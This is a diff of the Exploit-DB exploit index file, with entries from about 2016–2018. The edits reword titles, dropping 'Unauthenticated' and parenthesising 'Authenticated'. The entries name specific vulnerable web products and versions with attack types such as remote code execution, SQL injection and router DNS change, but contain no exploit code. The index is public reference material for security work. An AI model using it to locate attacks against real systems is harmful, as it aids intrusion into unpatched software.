39880,exploits/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",webapps,jsp, -39881,exploits/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706/1.5.1/1.5.3 - Unauthenticated Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",webapps,php,80 +39881,exploits/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706/1.5.1/1.5.3 - Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",webapps,php,80 40463,exploits/cgi/webapps/40463.txt,"Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution",2016-10-05,KoreLogic,webapps,cgi, 39884,exploits/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-06,"Ali Ghanbari",webapps,php,80 39886,exploits/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",webapps,java, @@ -37480,15 +37481,15 @@ id,file,description,date,author,type,platform,port 40068,exploits/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",webapps,php,80 40070,exploits/php/webapps/40070.txt,"WordPress Plugin Lazy Content Slider 3.4 - Cross-Site Request Forgery (Add Catetory)",2016-07-08,"Persian Hack Team",webapps,php,80 40076,exploits/php/webapps/40076.php,"PHP Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",webapps,php,80 -40077,exploits/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - Unauthenticated XML External Entity Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,webapps,xml,3052 +40077,exploits/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XML External Entity Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,webapps,xml,3052 40078,exploits/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,webapps,php,80 40106,exploits/windows/webapps/40106.txt,"GSX Analyzer 10.12/11 - 'main.swf' Hard-Coded Superadmin Credentials",2016-07-13,ndevnull,webapps,windows, 40109,exploits/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",webapps,xml, 40112,exploits/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,webapps,cgi,80 -40114,exploits/php/webapps/40114.py,"vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API Authenticated Persistent Cross-Site Scripting",2014-10-12,tintinweb,webapps,php, -40115,exploits/php/webapps/40115.py,"vBulletin 4.x - breadcrumbs via xmlrpc API Authenticated SQL Injection",2014-10-12,tintinweb,webapps,php, +40114,exploits/php/webapps/40114.py,"vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API (Authenticated) Persistent Cross-Site Scripting",2014-10-12,tintinweb,webapps,php, +40115,exploits/php/webapps/40115.py,"vBulletin 4.x - breadcrumbs via xmlrpc API (Authenticated) SQL Injection",2014-10-12,tintinweb,webapps,php, 40193,exploits/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",webapps,php,80 -40171,exploits/linux/webapps/40171.txt,"AXIS (Multiple Products) - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,webapps,linux,80 +40171,exploits/linux/webapps/40171.txt,"AXIS (Multiple Products) - 'devtools ' (Authenticated) Remote Command Execution",2016-07-29,Orwelllabs,webapps,linux,80 40126,exploits/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",webapps,php,80 40127,exploits/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",webapps,php,80 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80 @@ -37500,7 +37501,7 @@ id,file,description,date,author,type,platform,port 40149,exploits/php/webapps/40149.rb,"Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)",2016-07-25,"Mehmet Ince",webapps,php,80 40150,exploits/php/webapps/40150.txt,"CodoForum 3.2.1 - SQL Injection",2016-07-25,"Yakir Wizman",webapps,php,80 40153,exploits/php/webapps/40153.txt,"GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload",2016-07-25,kmkz,webapps,php,80 -40154,exploits/php/webapps/40154.txt,"PHP gettext 1.0.12 - 'gettext.php' Unauthenticated Code Execution",2016-07-25,kmkz,webapps,php, +40154,exploits/php/webapps/40154.txt,"PHP gettext 1.0.12 - 'gettext.php' Code Execution",2016-07-25,kmkz,webapps,php, 40156,exploits/cgi/webapps/40156.py,"Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",webapps,cgi,80 40157,exploits/cgi/webapps/40157.py,"Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",webapps,cgi,80 40158,exploits/hardware/webapps/40158.txt,"Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",webapps,hardware,80 @@ -37512,7 +37513,7 @@ id,file,description,date,author,type,platform,port 40166,exploits/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Command Execution",2016-07-26,LiquidWorm,webapps,cgi,80 40174,exploits/php/webapps/40174.txt,"WordPress Plugin Ultimate Product Catalog 3.9.8 - do_shortcode via ajax Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",webapps,php,80 40180,exploits/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7/3.8 SP1 (3.81)/3.8 SP2 (3.82) - 'hotfix_upload.cgi' Filename Remote Code Execution",2016-07-29,korpritzombie,webapps,linux,443 -40185,exploits/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Authenticated Remote Code Execution",2016-07-29,@iamsecurity,webapps,php,80 +40185,exploits/php/webapps/40185.py,"phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution",2016-07-29,@iamsecurity,webapps,php,80 40189,exploits/php/webapps/40189.txt,"WordPress Plugin Booking Calendar 6.2 - SQL Injection",2016-08-01,"Edwin Molenaar",webapps,php,80 40190,exploits/php/webapps/40190.txt,"WordPress Plugin WP Live Chat Support 6.2.03 - Persistent Cross-Site Scripting",2016-08-01,"Dennis Kerdijk & Erwin Kievith",webapps,php,80 40191,exploits/php/webapps/40191.txt,"WordPress Plugin ALO EasyMail NewsLetter 2.9.2 - Cross-Site Request Forgery (Add/Import Arbitrary Subscribers)",2016-08-01,"Yorick Koster",webapps,php,80 @@ -37532,7 +37533,7 @@ id,file,description,date,author,type,platform,port 40218,exploits/php/webapps/40218.txt,"PHPCollab CMS 2.5 - 'emailusers.php' SQL Injection",2016-08-08,Vulnerability-Lab,webapps,php,80 40220,exploits/php/webapps/40220.txt,"WordPress Plugin Add From Server < 3.3.2 - Cross-Site Request Forgery (Arbitrary File Upload)",2016-08-08,"Edwin Molenaar",webapps,php,80 40221,exploits/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-08-10,hyp3rlinx,webapps,php,80 -40225,exploits/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",webapps,php,80 +40225,exploits/php/webapps/40225.py,"vBulletin 5.2.2 - Server-Side Request Forgery",2016-08-10,"Dawid Golunski",webapps,php,80 40227,exploits/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,webapps,php,80 40228,exploits/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Code Execution",2016-08-10,LiquidWorm,webapps,php,80 40229,exploits/jsp/webapps/40229.txt,"WebNMS Framework Server 5.2/5.2 SP1 - Multiple Vulnerabilities",2016-08-10,"Pedro Ribeiro",webapps,jsp, @@ -37564,7 +37565,7 @@ id,file,description,date,author,type,platform,port 40273,exploits/cgi/webapps/40273.txt,"TOPSEC Firewalls - 'ELIGIBLECANDIDATE' Remote Code Execution",2016-08-19,"Shadow Brokers",webapps,cgi, 40274,exploits/cgi/webapps/40274.txt,"TOPSEC Firewalls - 'ELIGIBLEBOMBSHELL' Remote Code Execution",2016-08-19,"Shadow Brokers",webapps,cgi, 40276,exploits/hardware/webapps/40276.txt,"Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution",2016-08-19,"Shadow Brokers",webapps,hardware, -40277,exploits/cgi/webapps/40277.sh,"MESSOA IP Cameras (Multiple Models) - Unauthenticated Password Change",2016-08-19,"Todor Donev",webapps,cgi,80 +40277,exploits/cgi/webapps/40277.sh,"MESSOA IP Cameras (Multiple Models) - Password Change",2016-08-19,"Todor Donev",webapps,cgi,80 40278,exploits/php/webapps/40278.txt,"tcPbX - 'tcpbx_lang' Local File Inclusion",2016-08-19,0x4148,webapps,php, 40282,exploits/cgi/webapps/40282.txt,"JVC IP-Camera VN-T216VPRU - Local File Disclosure",2016-08-22,"Yakir Wizman",webapps,cgi, 40283,exploits/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",webapps,cgi, @@ -37626,11 +37627,11 @@ id,file,description,date,author,type,platform,port 43600,exploits/php/webapps/43600.txt,"Flash Operator Panel 2.31.03 - Command Execution",2018-01-15,Vulnerability-Lab,webapps,php,80 43667,exploits/php/webapps/43667.txt,"Zomato Clone Script - Arbitrary File Upload",2018-01-17,Tauco,webapps,php, 43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php, -43678,exploits/hardware/webapps/43678.txt,"D-Link DSL-2640R - Unauthenticated DNS Change",2018-01-17,"Todor Donev",webapps,hardware, +43678,exploits/hardware/webapps/43678.txt,"D-Link DSL-2640R - DNS Change",2018-01-17,"Todor Donev",webapps,hardware, 43682,exploits/hardware/webapps/43682.txt,"Belkin N600DB Wireless Router - Multiple Vulnerabilities",2018-01-17,Wadeek,webapps,hardware, 43683,exploits/php/webapps/43683.txt,"SugarCRM 3.5.1 - Cross-Site Scripting",2018-01-17,"Guilherme Assmann",webapps,php, 43733,exploits/java/webapps/43733.rb,"Primefaces 5.x - Remote Code Execution (Metasploit)",2018-01-18,"Bjoern Schuette",webapps,java, -43777,exploits/php/webapps/43777.py,"GitStack 2.3.10 - Unauthenticated Remote Code Execution",2018-01-18,"Kacper Szurek",webapps,php, +43777,exploits/php/webapps/43777.py,"GitStack 2.3.10 - Remote Code Execution",2018-01-18,"Kacper Szurek",webapps,php, 43789,exploits/php/webapps/43789.txt,"Invision Power Top Site List < 2.0 Alpha 3 - SQL Injection (PoC)",2003-12-15,"GulfTech Security",webapps,php, 43790,exploits/php/webapps/43790.txt,"Invision Power Board (IP.Board) < 2.0 Alpha 3 - SQL Injection (PoC)",2003-12-16,"GulfTech Security",webapps,php, 43791,exploits/php/webapps/43791.txt,"Aardvark Topsites < 4.1.0 - Multiple Vulnerabilities",2003-12-16,"GulfTech Security",webapps,php, @@ -37755,7 +37756,7 @@ id,file,description,date,author,type,platform,port 40645,exploits/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,webapps,php, 40641,exploits/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting Vulnerabilities",2016-10-28,LiquidWorm,webapps,php, 40646,exploits/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,webapps,php, -40640,exploits/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Command Execution",2016-10-28,LiquidWorm,webapps,hardware, +40640,exploits/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Remote Command Execution",2016-10-28,LiquidWorm,webapps,hardware, 40637,exploits/php/webapps/40637.txt,"Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation",2016-10-27,"Xiphos Research Ltd",webapps,php,80 40650,exploits/php/webapps/40650.txt,"S9Y Serendipity 2.0.4 - Cross-Site Scripting",2016-10-31,Besim,webapps,php, 40671,exploits/php/webapps/40671.txt,"School Registration and Fee System - Authentication Bypass",2016-11-01,opt1lc,webapps,php, @@ -37824,7 +37825,7 @@ id,file,description,date,author,type,platform,port 40940,exploits/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1)",2016-12-16,"Lenon Leite",webapps,php, 40941,exploits/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",webapps,php, 40942,exploits/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",webapps,multiple, -43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - Authenticated Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp, +43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp, 40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple, 40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php, 40968,exploits/php/webapps/40968.php,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php, @@ -37897,8 +37898,8 @@ id,file,description,date,author,type,platform,port 41071,exploits/php/webapps/41071.txt,"MC Documentation Creator Script - SQL Injection",2017-01-15,"Ihsan Sencan",webapps,php, 41074,exploits/hardware/webapps/41074.txt,"Huawei Flybox B660 - Cross-Site Request Forgery (2)",2017-01-12,Vulnerability-Lab,webapps,hardware, 41075,exploits/php/webapps/41075.txt,"Business Networking Script 8.11 - SQL Injection / Cross-Site Scripting",2017-01-16,"Ahmet Gurel",webapps,php, -41077,exploits/hardware/webapps/41077.sh,"Pirelli DRG A115 ADSL Router - Unauthenticated DNS Change",2017-01-16,"Todor Donev",webapps,hardware, -41078,exploits/hardware/webapps/41078.sh,"Tenda ADSL2/2+ Modem D840R - Unauthenticated DNS Change",2017-01-16,"Todor Donev",webapps,hardware, +41077,exploits/hardware/webapps/41077.sh,"Pirelli DRG A115 ADSL Router - DNS Change",2017-01-16,"Todor Donev",webapps,hardware, +41078,exploits/hardware/webapps/41078.sh,"Tenda ADSL2/2+ Modem D840R - DNS Change",2017-01-16,"Todor Donev",webapps,hardware, 41080,exploits/php/webapps/41080.txt,"Image Sharing Script 4.13 - Multiple Vulnerabilities",2017-01-16,"Hasan Emre Ozer",webapps,php, 41081,exploits/php/webapps/41081.txt,"Million Pixels 3 - Authentication Bypass",2017-01-16,"Ihsan Sencan",webapps,php, 41082,exploits/java/webapps/41082.txt,"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities",2017-01-08,"Mehmet Ince",webapps,java, @@ -37930,9 +37931,9 @@ id,file,description,date,author,type,platform,port 41112,exploits/php/webapps/41112.txt,"Study Abroad Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, 41113,exploits/php/webapps/41113.txt,"Courier Management System - SQL Injection",2017-01-17,"Sibusiso Sishi",webapps,php, 41114,exploits/php/webapps/41114.txt,"Flippa Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, -41117,exploits/hardware/webapps/41117.sh,"Tenda ADSL2/2+ Modem D820R - Unauthenticated DNS Change",2017-01-19,"Todor Donev",webapps,hardware, +41117,exploits/hardware/webapps/41117.sh,"Tenda ADSL2/2+ Modem D820R - DNS Change",2017-01-19,"Todor Donev",webapps,hardware, 41116,exploits/php/webapps/41116.txt,"B2B Script 4.27 - SQL Injection",2017-01-18,"Dawid Morawski",webapps,php, -41118,exploits/hardware/webapps/41118.sh,"Pirelli DRG A115 v3 ADSL Router - Unauthenticated DNS Change",2017-01-19,"Todor Donev",webapps,hardware, +41118,exploits/hardware/webapps/41118.sh,"Pirelli DRG A115 v3 ADSL Router - DNS Change",2017-01-19,"Todor Donev",webapps,hardware, 41119,exploits/php/webapps/41119.txt,"Viral Image & Video Sharing GagZone Script - SQL Injection",2017-01-19,"Ihsan Sencan",webapps,php, 41120,exploits/php/webapps/41120.txt,"Image and Video Script - SQL Injection",2017-01-19,"Ihsan Sencan",webapps,php, 41121,exploits/php/webapps/41121.txt,"Social News and Bookmarking Script - SQL Injection",2017-01-19,"Ihsan Sencan",webapps,php, @@ -37987,7 +37988,7 @@ id,file,description,date,author,type,platform,port 41197,exploits/php/webapps/41197.txt,"PHP Product Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",webapps,php, 41198,exploits/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",webapps,php, 41199,exploits/php/webapps/41199.txt,"Itech Video Sharing Script 4.94 - 'v' SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, -41200,exploits/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",webapps,php, +41200,exploits/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",webapps,php, 41205,exploits/hardware/webapps/41205.py,"NETGEAR Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",webapps,hardware, 41201,exploits/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php, 41202,exploits/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php, @@ -37996,8 +37997,8 @@ id,file,description,date,author,type,platform,port 41208,exploits/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",webapps,hardware, 41209,exploits/php/webapps/41209.txt,"Joomla! Component JTAG Calendar 6.2.4 - 'search' SQL Injection",2017-01-28,"Persian Hack Team",webapps,php, 41210,exploits/php/webapps/41210.txt,"LogoStore - 'query' SQL Injection",2017-02-01,"Kaan KAMIS",webapps,php, -41223,exploits/linux/webapps/41223.py,"WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Python)",2017-02-02,leonjza,webapps,linux, -41224,exploits/linux/webapps/41224.rb,"WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Ruby)",2017-02-02,"Harsh Jaiswal",webapps,linux, +41223,exploits/linux/webapps/41223.py,"WordPress 4.7.0/4.7.1 - Content Injection (Python)",2017-02-02,leonjza,webapps,linux, +41224,exploits/linux/webapps/41224.rb,"WordPress 4.7.0/4.7.1 - Content Injection (Ruby)",2017-02-02,"Harsh Jaiswal",webapps,linux, 41231,exploits/php/webapps/41231.txt,"Itech Travel Portal Script 9.35 - SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php, 41225,exploits/php/webapps/41225.txt,"Property Listing Script - 'propid' Blind SQL Injection",2017-02-02,"Kaan KAMIS",webapps,php, 41226,exploits/php/webapps/41226.txt,"Itech Inventory Management Software 3.77 - SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php, @@ -38290,8 +38291,8 @@ id,file,description,date,author,type,platform,port 41618,exploits/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",webapps,aspx, 43357,exploits/php/webapps/43357.txt,"Joomla! Component User Bench 1.0 - 'userid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php, 43358,exploits/php/webapps/43358.txt,"Joomla! Component My Projects 2.0 - SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php, -43361,exploits/multiple/webapps/43361.md,"vBulletin 5 - 'routestring' Unauthenticated Remote Code Execution",2017-12-13,SecuriTeam,webapps,multiple, -43362,exploits/multiple/webapps/43362.md,"vBulletin 5 - 'cacheTemplates' Unauthenticated Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple, +43361,exploits/multiple/webapps/43361.md,"vBulletin 5 - 'routestring' Remote Code Execution",2017-12-13,SecuriTeam,webapps,multiple, +43362,exploits/multiple/webapps/43362.md,"vBulletin 5 - 'cacheTemplates' Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple, 43363,exploits/hardware/webapps/43363.py,"Linksys WVBR0 - 'User-Agent' Remote Command Injection",2017-12-14,nixawk,webapps,hardware, 43364,exploits/hardware/webapps/43364.txt,"BrightSign Digital Signage - Multiple Vulnerablities",2017-12-19,"Information Paradox",webapps,hardware, 43365,exploits/php/webapps/43365.txt,"Joomla! Component NextGen Editor 2.1.0 - 'plname' SQL Injection",2017-12-19,"Ihsan Sencan",webapps,php, @@ -38347,7 +38348,7 @@ id,file,description,date,author,type,platform,port 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware, 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware, 41627,exploits/php/webapps/41627.txt,"Departmental Store Management System 1.2 - SQL Injection",2017-03-17,"Ihsan Sencan",webapps,php, -41628,exploits/linux/webapps/41628.py,"Cobbler 2.8.0 - Authenticated Remote Code Execution",2017-03-16,"Dolev Farhi",webapps,linux, +41628,exploits/linux/webapps/41628.py,"Cobbler 2.8.0 - (Authenticated) Remote Code Execution",2017-03-16,"Dolev Farhi",webapps,linux, 41632,exploits/php/webapps/41632.txt,"iFdate Social Dating Script 2.0 - SQL Injection",2017-03-18,"Ihsan Sencan",webapps,php, 41633,exploits/hardware/webapps/41633.txt,"DIGISOL DG-HR1400 1.00.02 Wireless Router - Privilege Escalation",2017-03-18,Indrajith.A.N,webapps,hardware, 41634,exploits/php/webapps/41634.txt,"Omegle Clone - SQL Injection",2017-03-18,"Ihsan Sencan",webapps,php, @@ -38385,7 +38386,7 @@ id,file,description,date,author,type,platform,port 43958,exploits/php/webapps/43958.txt,"Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload",2018-02-02,"Ihsan Sencan",webapps,php, 43959,exploits/php/webapps/43959.txt,"Joomla! Component JMS Music 1.1.1 - SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php, 43960,exploits/multiple/webapps/43960.py,"Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal",2018-02-02,"Dmitry Chastuhin",webapps,multiple, -43961,exploits/hardware/webapps/43961.txt,"FiberHome AN5506 - Unauthenticated Remote DNS Change",2018-02-02,r0ots3c,webapps,hardware, +43961,exploits/hardware/webapps/43961.txt,"FiberHome AN5506 - Remote DNS Change",2018-02-02,r0ots3c,webapps,hardware, 43963,exploits/php/webapps/43963.txt,"Wonder CMS 2.3.1 - Unrestricted File Upload",2018-02-05,"Samrat Das",webapps,php, 43964,exploits/php/webapps/43964.txt,"Wonder CMS 2.3.1 - 'Host' Header Injection",2018-02-05,"Samrat Das",webapps,php, 43965,exploits/php/webapps/43965.txt,"Matrimonial Website Script 2.1.6 - 'uid' SQL Injection",2018-02-05,L0RD,webapps,php, @@ -38428,8 +38429,8 @@ id,file,description,date,author,type,platform,port 44039,exploits/linux/webapps/44039.txt,"Dell EMC Isilon OneFS - Multiple Vulnerabilities",2018-02-14,"Core Security",webapps,linux, 44041,exploits/multiple/webapps/44041.txt,"Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution",2017-03-17,SecuriTeam,webapps,multiple, 44043,exploits/hardware/webapps/44043.md,"iBall WRA150N - Multiple Vulnerabilities",2018-01-29,SecuriTeam,webapps,hardware, -44044,exploits/php/webapps/44044.md,"GitStack - Unauthenticated Remote Code Execution",2018-01-15,SecuriTeam,webapps,php, -44050,exploits/php/webapps/44050.md,"Ametys CMS 4.0.2 - Unauthenticated Password Reset",2017-11-07,SecuriTeam,webapps,php, +44044,exploits/php/webapps/44044.md,"GitStack - Remote Code Execution",2018-01-15,SecuriTeam,webapps,php, +44050,exploits/php/webapps/44050.md,"Ametys CMS 4.0.2 - Password Reset",2017-11-07,SecuriTeam,webapps,php, 44051,exploits/linux/webapps/44051.md,"DblTek - Multiple Vulnerabilities",2017-11-21,SecuriTeam,webapps,linux, 44054,exploits/linux/webapps/44054.md,"FiberHome - Directory Traversal",2017-10-13,SecuriTeam,webapps,linux, 44056,exploits/php/webapps/44056.md,"PHP Melody 2.7.3 - Multiple Vulnerabilities",2017-10-09,SecuriTeam,webapps,php, @@ -38441,8 +38442,8 @@ id,file,description,date,author,type,platform,port 44065,exploits/hardware/webapps/44065.md,"Sophos XG Firewall 16.05.4 MR-4 - Path Traversal",2017-06-19,SecuriTeam,webapps,hardware, 44070,exploits/hardware/webapps/44070.md,"Cisco DPC3928 Router - Arbitrary File Disclosure",2017-05-10,SecuriTeam,webapps,hardware, 44071,exploits/windows/webapps/44071.md,"IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities",2017-06-08,SecuriTeam,webapps,windows, -44072,exploits/hardware/webapps/44072.md,"Geneko Routers - Unauthenticated Path Traversal",2017-07-16,SecuriTeam,webapps,hardware, -44074,exploits/hardware/webapps/44074.md,"Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution",2017-12-06,SecuriTeam,webapps,hardware, +44072,exploits/hardware/webapps/44072.md,"Geneko Routers - Path Traversal",2017-07-16,SecuriTeam,webapps,hardware, +44074,exploits/hardware/webapps/44074.md,"Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Remote Code Execution",2017-12-06,SecuriTeam,webapps,hardware, 44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - X-Path Injection",2018-02-16,"Shayan S",webapps,asp,443 44100,exploits/php/webapps/44100.txt,"TV - Video Subscription - Authentication Bypass SQL Injection",2018-02-16,L0RD,webapps,php,80 44101,exploits/php/webapps/44101.py,"UserSpice 4.3 - Blind SQL Injection",2018-02-16,"Dolev Farhi",webapps,php,80 @@ -38504,7 +38505,7 @@ id,file,description,date,author,type,platform,port 41687,exploits/multiple/webapps/41687.rb,"OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit)",2015-01-05,Metasploit,webapps,multiple, 41688,exploits/multiple/webapps/41688.rb,"PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)",2016-12-26,Metasploit,webapps,multiple, 41691,exploits/multiple/webapps/41691.rb,"SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit)",2015-06-03,Metasploit,webapps,multiple, -41692,exploits/multiple/webapps/41692.rb,"WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - Unauthenticated File Upload (Metasploit)",2016-05-04,Metasploit,webapps,multiple, +41692,exploits/multiple/webapps/41692.rb,"WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - File Upload (Metasploit)",2016-05-04,Metasploit,webapps,multiple, 41697,exploits/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,webapps,linux, 41698,exploits/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,webapps,linux, 41714,exploits/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,webapps,windows, @@ -38612,7 +38613,7 @@ id,file,description,date,author,type,platform,port 41958,exploits/java/webapps/41958.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure",2017-05-03,LiquidWorm,webapps,java, 41960,exploits/java/webapps/41960.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change",2017-05-03,LiquidWorm,webapps,java, 41961,exploits/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,webapps,windows, -41962,exploits/linux/webapps/41962.sh,"WordPress 4.6 - Unauthenticated Remote Code Execution",2017-05-03,"Dawid Golunski",webapps,linux, +41962,exploits/linux/webapps/41962.sh,"WordPress 4.6 - Remote Code Execution",2017-05-03,"Dawid Golunski",webapps,linux, 41963,exploits/linux/webapps/41963.txt,"WordPress < 4.7.4 - Unauthorized Password Reset",2017-05-03,"Dawid Golunski",webapps,linux, 41966,exploits/php/webapps/41966.txt,"WordPress Plugin WebDorado Gallery 1.3.29 - SQL Injection",2017-05-05,defensecode,webapps,php,80 41967,exploits/php/webapps/41967.md,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities",2017-05-05,Sysdream,webapps,php,80 @@ -38652,7 +38653,7 @@ id,file,description,date,author,type,platform,port 42069,exploits/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",webapps,multiple, 